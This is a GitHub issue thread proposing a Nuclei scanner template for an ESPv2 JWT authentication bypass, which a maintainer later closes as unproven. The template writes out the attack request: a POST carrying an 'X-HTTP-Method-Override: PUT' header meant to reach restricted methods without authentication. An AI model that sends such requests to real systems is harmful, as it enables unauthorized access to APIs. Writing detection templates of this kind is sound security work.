### ISSUE TITLE
JWT authentication bypass via X-HTTP-Method-Override header

### ISSUE THREAD

**Issue by Facucuervo87** [projectdiscovery/nuclei-templates#7481]
### Template Information:

JWT authentication bypass via `X-HTTP-Method-Override` header

ESPv2 contains an authentication bypass vulnerability. API clients can craft a malicious X-HTTP-Method-Override header value to bypass JWT authentication in specific cases.

Reference: https://github.com/GoogleCloudPlatform/esp-v2/security/advisories/GHSA-6qmp-9p95-fc5f

### Nuclei Template:

```id: JWT-authentication-bypass
info:
  name: JWT authentication bypass via X-HTTP-Method-Override header
  author: h4kux
  severity: high
  description: ESPv2 contains an authentication bypass vulnerability. API clients can craft a malicious X-HTTP-Method-Override header value to bypass JWT authentication in specific cases.
  reference: https://github.com/GoogleCloudPlatform/esp-v2/security/advisories/GHSA-6qmp-9p95-fc5f
  tags: ESPv2,jwt

http:
  - method: POST
    path:
      - "{{BaseURL}}/api"
    headers:
      X-HTTP-Method-Override: PUT
      Content-Type: application/json
    body: '{"payload":"compromised"}'
    matchers:
      - type: word
        words:
          - '{"message":"Accessing restricted method.","method":"PUT","payload":"compromised"}'
```

There's no any positive result at the moment but the templetade is based on the PoC.

**Comment by princechaddha** [comment]
Hi @Facucuervo87, The response time for this issue was longer than usual. Thank you for creating the issue and contributing to the project. After reviewing the reference, it seems that the template is POC-based, which may not function effectively in real-world scenarios, particularly in detecting authentication bypasses. Hence, I'm closing this issue. However, please feel free to reopen it or submit another PR if you have additional information or another template to share.

Join our [discord server](https://discord.com/invite/projectdiscovery) to connect with fellow contributors and stay up-to-date with the latest developments. Thank you once again for your participation.
